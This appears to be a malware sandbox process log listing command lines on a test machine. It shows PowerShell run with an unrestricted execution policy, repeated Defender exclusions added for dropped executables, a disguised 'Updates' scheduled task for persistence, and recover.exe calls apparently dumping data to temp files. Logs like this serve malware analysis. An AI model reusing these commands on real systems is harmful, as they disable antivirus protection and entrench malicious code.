powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\pdf.ps1
2544powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\tmpF8C7.exe"
2904powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\gFnEPEuEhX.exe"
2960schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gFnEPEuEhX" /XML "C:\Users\test22\AppData\Local\Temp\tmp581D.tmp"
3000schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gFnEPEuEhX" /XML "C:\Users\test22\AppData\Local\Temp\tmpB0BD.tmp"
2784powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\gFnEPEuEhX.exe"
2612powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\Tencent\process.exe"
2716recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\test22\AppData\Local\Temp\vyfeuhxwjibvrjt"
2760recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\test22\AppData\Local\Temp\fasonaiqxqtibpizyt"
2084recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\test22\AppData\Local\Temp\quyhostrlzlneeedpehqj"
3008recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\test22\AppData\Local\Temp\ndzrljywndhla"
2664recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\test22\AppData\Local\Temp\xgeklcjyjlzycrsr"
828recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\test22\AppData\Local\Temp\hajumutsxtrdnxgvappx"
2696